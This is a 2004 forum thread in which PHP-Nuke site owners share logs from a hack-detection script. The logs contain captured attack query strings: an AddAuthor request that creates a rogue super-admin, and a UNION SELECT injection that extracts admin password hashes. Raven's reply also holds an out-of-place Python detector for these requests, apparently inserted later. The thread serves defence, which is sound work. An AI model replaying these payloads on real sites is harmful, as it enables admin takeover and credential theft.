Ravens PHP Scripts: Forums
Ravens PHP Scripts And Web Hosting Forum Index -> Hack Attempt Script
sharlein
Member Emeritus
Joined: Nov 19, 2002
Posts: 322
Location: On the Road
Posted: Wed Mar 31, 2004 9:58 am

Quote:
80.55.93.226

DOCUMENT_ROOT :public_html
HTTP_ACCEPT : image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/msword, */*
HTTP_ACCEPT_ENCODING : gzip, deflate
HTTP_ACCEPT_LANGUAGE : pl
HTTP_CONNECTION : Keep-Alive
HTTP_COOKIE : lang=english
HTTP_HOST :
HTTP_USER_AGENT : Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt)
PATH : /sbin:/usr/sbin:/bin:/usr/bin:/usr/X11R6/bin
REMOTE_ADDR : 80.55.93.226
REMOTE_PORT : 1864
SCRIPT_FILENAME : html/hackattempt.php
SERVER_ADDR :
SERVER_ADMIN :
SERVER_NAME :
SERVER_PORT :
SERVER_SIGNATURE : Apache/1.3.29 Server at Port 80

SERVER_SOFTWARE : Apache/1.3.29 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 PHP/4.3.3 FrontPage/5.0.2.2634 mod_ssl/2.8.16 OpenSSL/0.9.7a
GATEWAY_INTERFACE : CGI/1.1
SERVER_PROTOCOL : HTTP/1.1
REQUEST_METHOD : GET
QUERY_STRING : op=AddAuthor&add_aid=attacker&add_name=God&add_pwd=coolpass&add_email=kala%20hot%20ee&add_radminsuper=1
REQUEST_URI : /Nuke/html/hackattempt.php?op=AddAuthor&add_aid=attacker&add_name=God&add_pwd=coolpass&add_email=kala%20hot%20ee&add_radminsuper=1
SCRIPT_NAME : html/hackattempt.php
PATH_TRANSLATED : html/hackattempt.php
PHP_SELF : html/hackattempt.php
argv : Array
argc : 1


_________________
Give Me Ambiguity Or Give Me Something Else! 
64bitguy
The Mouse Is Extension Of Arm
Joined: Mar 06, 2004
Posts: 1164
Posted: Mon Apr 05, 2004 12:27 am

This one was busted by RavenScript tonight.

The proxy reported by the script was:
Quote:
80.80.128.163

HTTP_X_FORWARDED_FOR : 80.80.133.68
REMOTE_ADDR : 80.80.128.163
REMOTE_PORT : 53987
SCRIPT_FILENAME : /hackattempt.php
SERVER_NAME : www.64bit.us
SERVER_PORT : 80
SCRIPT_NAME : /hackattempt.php
PHP_SELF : /hackattempt.php


A closer look at the IP address forwarded by the Proxy in this attack (80.80.133.68) revealed:

_________________
Steph Benoit
100% Section 508 and W3C HTML5 and CSS Compliant (Truly) Code, because I love compliance.

Last edited by 64bitguy on Thu Apr 08, 2004 6:05 pm; edited 3 times in total 
64bitguy
Posted: Thu Apr 08, 2004 6:02 pm

Busted 217.219.75.92 / 216.148.246.70

Quote:
HTTP_VIA : 1.1 cssj3prx02.marketscore.com (NGP Diatom vfc3), 1.0 cssj3che01 (NetCache NetApp/5.2.1R1)
HTTP_X_FORWARDED_FOR : 217.219.75.92, 10.101.3.111
REMOTE_ADDR : 216.148.246.70
REMOTE_PORT : 20409
SCRIPT_NAME : /hackattempt.php
PHP_SELF : /hackattempt.php
 
HauntedWebby
Involved
Joined: May 19, 2004
Posts: 363
Location: Ogden, UT
Posted: Thu May 20, 2004 9:56 am

Raven caught one for me - May 19, 2004 10:19PM (MST)

Quote:
201.5.225.38

PATH : /usr/local/bin:/usr/bin:/bin
DOCUMENT_ROOT : /h*/l*/p*
HTTP_ACCEPT : image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
HTTP_ACCEPT_ENCODING : gzip, deflate
HTTP_ACCEPT_LANGUAGE : pt-br
HTTP_CONNECTION : Keep-Alive
HTTP_COOKIE : lang=english; msa_resolution=1024x768x32
HTTP_HOST : www.lazarusmaze.com
HTTP_USER_AGENT : Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt)
REMOTE_ADDR : 201.5.225.38
REMOTE_PORT : 1369
SCRIPT_FILENAME : /h*/l*/p*/hackattempt.php
SERVER_ADDR : 66.**.2**.73
SERVER_ADMIN : webmaster@lazarusmaze.net
SERVER_NAME : www.lazarusmaze.net
SERVER_PORT : 80
SERVER_SOFTWARE : Apache/1.3.29 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 FrontPage/5.0.2.2634 mod_ssl/2.8.16 OpenSSL/0.9.7a PHP-CGI/0.1b
GATEWAY_INTERFACE : CGI/1.1
SERVER_PROTOCOL : HTTP/1.1
REQUEST_METHOD : GET
QUERY_STRING : name=nukejokes&file=print&jokeid=-1/**/union/**/select/**/aid,pwd/**/from/**/nuke_authors/**/where/**/radminsuper=1/**/limit/**/1/*
REQUEST_URI : /hackattempt.php?name=nukejokes&file=print&jokeid=-1/**/union/**/select/**/aid,pwd/**/from/**/nuke_authors/**/where/**/radminsuper=1/**/limit/**/1/*
SCRIPT_NAME : /hackattempt.php
PHP_SELF : /hackattempt.php
argv : Array
argc : 1

 
Raven
Site Admin/Owner
Joined: Aug 27, 2002
Posts: 17088
Posted: Thu May 20, 2004 10:40 am

Cool
 
jamesmc
New Member
Joined: Dec 22, 2003
Posts: 21
Posted: Tue Jun 01, 2004 6:13 am

My site was hacked this weekend despite the script being in place and operational (tested as per Raven's Readme file). They must have found another way in. How, I don't know, as no report was generated and emailed.

Plastered all over the place was: ‘This Sait Hacked by Leroy Security Team’

Wouldn't be so bad if they could at least spell!!

Are there any other security enhancements that you guys can recommend?

regards
James Mc
 
Raven
Posted: Tue Jun 01, 2004 6:27 am

This hack alert script is strictly for the UNION type attacks. Unless you have installed Chatserv's security fixes then you have been and are at risk. However, this script has been supplanted by Sentinel(tm) which is a comprehensive security application. You should install Sentinel immediately and then check your logs to discover what method the hackers used.
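As an added defender-side illustration (my own code, not the Hack Attempt Script or Sentinel), here is a small Python checker that normalizes a request's query string the way the two requests quoted earlier in this thread need (URL-decoding and turning the `/**/` comments used as whitespace back into spaces) and then flags both the UNION SELECT pattern from the nukejokes request and the AddAuthor request with add_radminsuper=1. The sample query strings are constructed from the ones quoted in this thread plus one benign request; the function names are my own.

```python
import re
from urllib.parse import parse_qs, unquote_plus

# Constructed samples modelled on the two requests quoted in this thread,
# plus one benign request for comparison (not taken from any real log).
SAMPLE_QUERIES = [
    "name=nukejokes&file=print&jokeid=-1/**/union/**/select/**/aid,pwd"
    "/**/from/**/nuke_authors/**/where/**/radminsuper=1/**/limit/**/1/*",
    "op=AddAuthor&add_aid=attacker&add_name=God&add_pwd=coolpass"
    "&add_email=kala%20hot%20ee&add_radminsuper=1",
    "name=nukejokes&file=print&jokeid=42",
]

# "union", optionally followed by "all", then "select", as whole words.
UNION_SELECT = re.compile(r"\bunion\b(?:\s+all)?\s+select\b")


def normalize(value: str) -> str:
    """URL-decode a parameter value, turn inline SQL comments (used in the
    quoted attack as a whitespace substitute) into spaces, collapse
    whitespace and lowercase, so the regex sees the query as MySQL would."""
    decoded = unquote_plus(value)
    no_comments = re.sub(r"/\*.*?\*/", " ", decoded)   # /**/ and /* ... */
    no_comments = re.sub(r"/\*.*$", " ", no_comments)  # unterminated trailing /*
    return re.sub(r"\s+", " ", no_comments).strip().lower()


def classify(query_string: str) -> list:
    """Return the findings for one raw QUERY_STRING (empty list if clean)."""
    findings = []
    params = parse_qs(query_string, keep_blank_values=True)
    for name, values in params.items():
        for raw in values:
            if UNION_SELECT.search(normalize(raw)):
                findings.append(f"union-select in parameter {name}")
    # Super-admin author creation: op=AddAuthor together with add_radminsuper=1,
    # the combination seen in the first request quoted in this thread.
    if params.get("op") == ["AddAuthor"] and params.get("add_radminsuper") == ["1"]:
        findings.append("AddAuthor request with add_radminsuper=1")
    return findings


if __name__ == "__main__":
    for query in SAMPLE_QUERIES:
        print(query[:60], "->", classify(query) or "clean")
```

Run against a real access log, the same classify() call would be applied to the query part of each request line, which is also how a defacement that left no Hack Attempt Script report could be traced after the fact.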
 
HauntedWebby
Posted: Tue Jun 01, 2004 9:47 am

I have all three (this script, Chatserv & Sentinel) and I went from being hacked once a week to not seeing anything.
 
jamesmc
Posted: Tue Jun 01, 2004 4:34 pm

Hi Raven

Thanks for the input. Much appreciated.

Keep up the good work.

regards
James Mc
 
Powered by phpBB © 2001-2007 phpBB Group
All times are GMT - 6 Hours